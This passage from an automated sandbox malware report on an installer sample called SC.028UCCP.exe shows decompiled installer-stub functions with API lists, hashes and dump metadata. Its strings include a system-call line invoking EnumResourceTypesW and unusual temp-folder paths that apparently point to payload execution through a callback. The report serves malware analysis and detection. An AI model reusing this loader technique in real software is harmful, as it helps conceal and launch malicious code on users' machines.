                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 590372296-366298937
                                  • Opcode ID: deddfd4e36412dec96aa055fb552b981f44ea6835fd62dd796566a0b1e2ef51b
                                  • Instruction ID: a21e6249ac8bc888c709a424ccf7157ce7a7130d11ef99fd9928d349982f1b83
                                  • Opcode Fuzzy Hash: deddfd4e36412dec96aa055fb552b981f44ea6835fd62dd796566a0b1e2ef51b
                                  • Instruction Fuzzy Hash: A1A13A70900208FFEB219F61DC89AAE7F79FB04355F10817AFA05AA1A0C7755A41DF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004042E6 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 268stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 83%
                                  			E004042E6(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				struct HWND__* _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t78;
				long _t83;
				signed char* _t85;
				void* _t91;
				signed int _t92;
				signed char _t110;
				signed int _t114;
				struct HWND__** _t118;
				intOrPtr _t120;
				intOrPtr* _t134;
				CHAR* _t142;
				intOrPtr _t144;
				signed char _t145;
				signed int _t146;
				signed int _t150;
				signed int* _t152;
				signed int _t153;
				signed char* _t154;
				struct HWND__* _t159;
				struct HWND__* _t160;
				int _t162;

				_t78 =  *0x4297f8;
				_v36 = _t78;
				_t142 = ( *(_t78 + 0x3c) << 0xa) + "kernel32::EnumResourceTypesW(i 0,i r1,i 0)";
				_v12 =  *((intOrPtr*)(_t78 + 0x38));
				if(_a8 == 0x40b) {
					E004053AD(0x3fb, _t142);
					E00405E03(_t142);
				}
				_t160 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004053AD(0x3fb, _t142);
							if(E00405733(_t179, _t142) == 0) {
								_v8 = 1;
							}
							E00405B98(0x428ff0, _t142);
							_t152 = 0;
							_t83 = E00405EC3(0);
							_v16 = _t83;
							if(_t83 == 0 || 0 == 0x428ff0) {
								L30:
								E00405B98(0x428ff0, _t142);
								_t85 = E004056DE(0x428ff0);
								if(_t85 != 0) {
									 *_t85 =  *_t85 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428ff0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L36;
								} else {
									_t162 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L37;
								}
							} else {
								while(1) {
									_t110 = _v16(0x428ff0,  &_v44,  &_v32,  &_v24);
									if(_t110 != 0) {
										break;
									}
									if(_t152 != 0) {
										 *_t152 =  *_t152 & _t110;
									}
									_t154 = E0040568C(0x428ff0);
									 *_t154 =  *_t154 & 0x00000000;
									_t152 = _t154 - 1;
									 *_t152 = 0x5c;
									if(_t152 != 0x428ff0) {
										continue;
									} else {
										goto L30;
									}
								}
								_v16 = 0xa;
								_t145 = _v16;
								_t150 = _v40;
								_v40 = _t150 >> _t145;
								_t153 = (_t150 << 0x00000020 | _v44) >> _t145;
								_v12 = 1;
								L36:
								_t162 = 0x400;
								L37:
								_t91 = E00404743(5);
								if(_v12 != 0 && _t153 < _t91) {
									_v8 = 2;
								}
								_t144 =  *0x42e37c; // 0x5ac8c7
								if( *((intOrPtr*)(_t144 + 0x10)) != 0) {
									E0040468E(0x3ff, 0xfffffffb, _t91);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, _t162, 0x428fe0);
									} else {
										E0040468E(_t162, 0xfffffffc, _t153);
									}
								}
								_t92 = _v8;
								 *0x42ec44 = _t92;
								if(_t92 == 0) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t162) != 0) {
									_v8 = 0;
								}
								E00403ECA(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x42a010 == 0) {
									E0040427B();
								}
								 *0x42a010 = 0;
								goto L52;
							}
						}
						_t179 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L52;
						}
						goto L22;
					}
					_t114 = _a12 & 0x0000ffff;
					if(_t114 != 0x3fb) {
						L12:
						if(_t114 == 0x3e9) {
							_t146 = 7;
							memset( &_v72, 0, _t146 << 2);
							_v76 = _t160;
							_v68 = 0x42a020;
							_v56 = E00404628;
							_v52 = _t142;
							_v64 = E00405BBA(_t142, 0x42a020, _t160, 0x4293f8, _v12);
							_t118 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t118);
							if(_t118 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t118);
								E00405645(_t142);
								_t120 =  *0x42ebb0; // 0x5aa248
								_t121 =  *((intOrPtr*)(_t120 + 0x11c));
								if( *((intOrPtr*)(_t120 + 0x11c)) != 0 && _t142 == "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter") {
									E00405BBA(_t142, 0x42a020, _t160, 0, _t121);
									if(lstrcmpiA(0x42db40, 0x42a020) != 0) {
										lstrcatA(_t142, 0x42db40);
									}
								}
								 *0x42a010 =  *0x42a010 + 1;
								SetDlgItemTextA(_t160, 0x3fb, _t142);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L52;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = GetDlgItem(_t160, 0x3fb);
					if(E004056B2(_t142) != 0 && E004056DE(_t142) == 0) {
						E00405645(_t142);
					}
					 *0x42e378 = _t160;
					SetWindowTextA(_t159, _t142);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403EA8(_t160);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403EA8(_t160);
					E00403EDD(_t159);
					_t134 = E00405EC3(7);
					if(_t134 == 0) {
						L52:
						return E00403F0F(_a8, _a12, _a16);
					}
					 *_t134(_t159, 1);
					goto L8;
				}
			}












































                                  0x004042ec
                                  0x004042f2
                                  0x004042ff
                                  0x0040430d
                                  0x00404310
                                  0x00404318
                                  0x0040431e
                                  0x0040431e
                                  0x0040432a
                                  0x0040432d
                                  0x0040439b
                                  0x004043a2
                                  0x00404479
                                  0x00404480
                                  0x0040448f
                                  0x0040448f
                                  0x00404493
                                  0x0040449d
                                  0x004044aa
                                  0x004044ac
                                  0x004044ac
                                  0x004044ba
                                  0x004044bf
                                  0x004044c2
                                  0x004044c9
                                  0x004044cc
                                  0x00404501
                                  0x00404503
                                  0x00404509
                                  0x00404510
                                  0x00404512
                                  0x00404512
                                  0x0040452e
                                  0x00404575
                                  0x00000000
                                  0x00404530
                                  0x00404533
                                  0x00404547
                                  0x00404549
                                  0x00000000
                                  0x00404549
                                  0x004044d4
                                  0x004044d4
                                  0x004044e1
                                  0x004044e6
                                  0x00000000
                                  0x00000000
                                  0x004044ea
                                  0x004044ec
                                  0x004044ec
                                  0x004044f4
                                  0x004044f6
                                  0x004044f9
                                  0x004044fc
                                  0x004044ff
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004044ff
                                  0x00404552
                                  0x00404559
                                  0x0040455f
                                  0x00404567
                                  0x0040456a
                                  0x0040456c
                                  0x00404578
                                  0x00404578
                                  0x0040457d
                                  0x0040457f
                                  0x00404589
                                  0x0040458f
                                  0x0040458f
                                  0x00404596
                                  0x0040459f
                                  0x004045a9
                                  0x004045b1
                                  0x004045c7
                                  0x004045b3
                                  0x004045b7
                                  0x004045b7
                                  0x004045b1
                                  0x004045cc
                                  0x004045d1
                                  0x004045d6
                                  0x004045df
                                  0x004045df
                                  0x004045e8
                                  0x004045ea
                                  0x004045ea
                                  0x004045f6
                                  0x004045fe
                                  0x00404608
                                  0x00404608
                                  0x0040460d
                                  0x00000000
                                  0x0040460d
                                  0x004044cc
                                  0x00404482
                                  0x00404489
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00404489
                                  0x004043a8
                                  0x004043b1
                                  0x004043cb
                                  0x004043d0
                                  0x004043da
                                  0x004043e1
                                  0x004043ed
                                  0x004043f0
                                  0x004043f3
                                  0x004043fa
                                  0x00404402
                                  0x00404405
                                  0x00404409
                                  0x00404410
                                  0x00404418
                                  0x00404472
                                  0x0040441a
                                  0x0040441b
                                  0x00404422
                                  0x00404427
                                  0x0040442c
                                  0x00404434
                                  0x00404441
                                  0x00404455
                                  0x00404459
                                  0x00404459
                                  0x00404455
                                  0x0040445e
                                  0x0040446b
                                  0x0040446b
                                  0x00404418
                                  0x00000000
                                  0x004043d0
                                  0x004043be
                                  0x00000000
                                  0x00000000
                                  0x004043c4
                                  0x00000000
                                  0x0040432f
                                  0x0040433c
                                  0x00404345
                                  0x00404352
                                  0x00404352
                                  0x00404359
                                  0x0040435f
                                  0x00404368
                                  0x0040436b
                                  0x0040436e
                                  0x00404376
                                  0x00404379
                                  0x0040437c
                                  0x00404382
                                  0x00404389
                                  0x00404390
                                  0x00404613
                                  0x00404625
                                  0x00404625
                                  0x00404399
                                  0x00000000
                                  0x00404399

                                  APIs
                                  • GetDlgItem.USER32 ref: 00404335
                                  • SetWindowTextA.USER32(00000000,?), ref: 0040435F
                                  • SHBrowseForFolderA.SHELL32(?,004293F8,?), ref: 00404410
                                  • CoTaskMemFree.OLE32(00000000), ref: 0040441B
                                  • lstrcmpiA.KERNEL32(Call,0042A020,00000000,?,?), ref: 0040444D
                                  • lstrcatA.KERNEL32(?,Call), ref: 00404459
                                  • SetDlgItemTextA.USER32 ref: 0040446B
                                    • Part of subcall function 004053AD: GetDlgItemTextA.USER32 ref: 004053C0
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E5B
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,?,?,00000000), ref: 00405E68
                                    • Part of subcall function 00405E03: CharNextA.USER32(?,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E6D
                                    • Part of subcall function 00405E03: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E7D
                                  • GetDiskFreeSpaceA.KERNEL32(00428FF0,?,?,0000040F,?,00428FF0,00428FF0,?,00000000,00428FF0,?,?,000003FB,?), ref: 00404526
                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404541
                                  • SetDlgItemTextA.USER32 ref: 004045C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                  • String ID: A$C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                  • API String ID: 2246997448-787186541
                                  • Opcode ID: d23cb239359365670f9594dc644bc9f5f48d86bff810e90447d5b69a40d7c4fd
                                  • Instruction ID: 9abece32c8f8525092503bbe75bfebeadc75c5700619eb1d4e27c73c3de0a32c
                                  • Opcode Fuzzy Hash: d23cb239359365670f9594dc644bc9f5f48d86bff810e90447d5b69a40d7c4fd
                                  • Instruction Fuzzy Hash: F99160B1900219ABDB11AFA1CC85FAF77B8EF84314F14447BFA01B62D1D77C9A418B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			E00402036() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x2c) = E00402A07(0xfffffff0);
				_t96 = E00402A07(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x30)) = E00402A07(2);
				 *((intOrPtr*)(_t100 - 8)) = E00402A07(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A07(0x45);
				if(E004056B2(_t96) == 0) {
					E00402A07(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x30)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x2c), 0xffffffff, 0x4093c0, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x4093c0, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                  0x0040203f
                                  0x00402049
                                  0x00402052
                                  0x0040205c
                                  0x00402065
                                  0x0040206f
                                  0x00402073
                                  0x00402073
                                  0x00402078
                                  0x00402089
                                  0x00402091
                                  0x00402171
                                  0x00402171
                                  0x00402178
                                  0x00402097
                                  0x00402097
                                  0x004020a8
                                  0x004020ac
                                  0x004020b2
                                  0x004020bc
                                  0x004020be
                                  0x004020c9
                                  0x004020cc
                                  0x004020d9
                                  0x004020db
                                  0x004020dd
                                  0x004020e4
                                  0x004020e7
                                  0x004020e7
                                  0x004020ea
                                  0x004020f4
                                  0x004020fc
                                  0x00402101
                                  0x0040210d
                                  0x0040210d
                                  0x00402110
                                  0x00402119
                                  0x0040211c
                                  0x00402125
                                  0x0040212a
                                  0x0040213c
                                  0x0040214b
                                  0x0040214d
                                  0x00402159
                                  0x00402159
                                  0x0040214b
                                  0x0040215b
                                  0x00402161
                                  0x00402161
                                  0x00402164
                                  0x0040216a
                                  0x0040216f
                                  0x00402184
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040216f
                                  0x0040217a
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402089
                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,004093C0,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402143
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91, xrefs: 004020C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91
                                  • API String ID: 123533781-3958623274
                                  • Opcode ID: 64eec70c754d109447af7b932e79b34c7f0716fcde24013fc759d13fc428f681
                                  • Instruction ID: c2a05210b12a7f26350eeaf6b52b14759966ff166b2aa6569d537109482c51a9
                                  • Opcode Fuzzy Hash: 64eec70c754d109447af7b932e79b34c7f0716fcde24013fc759d13fc428f681
                                  • Instruction Fuzzy Hash: D6415E75A00105BFCB04EFA4CD88EAE7BB9EF49314F204169F905EB2D1CA79AD41CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040264F Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 39%
                                  			E0040264F(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402A07(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405AF6(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405B98();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                                  0x00402667
                                  0x0040267b
                                  0x00402686
                                  0x00402687
                                  0x004027c2
                                  0x00402669
                                  0x00402669
                                  0x0040266b
                                  0x0040266d
                                  0x0040266d
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040265E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: 1dc36b911a92c03ca8d010b827bf73e80ff9ef9148a92f3886a19f506a53c419
                                  • Instruction ID: 0ab26aaebdd48f152f40d34805009047639191bb1b3aa8c2dea3f4c4e5e46e36
                                  • Opcode Fuzzy Hash: 1dc36b911a92c03ca8d010b827bf73e80ff9ef9148a92f3886a19f506a53c419
                                  • Instruction Fuzzy Hash: 0EF0A0326082109AD700E7B5A949AEEB7788B15324F60067BE101E20C2C6B969859B2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004062C3 Relevance: .3, Instructions: 334COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E004062C3(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E00406A32( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407374; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407374; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E00406A9A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004069F2))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409394 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
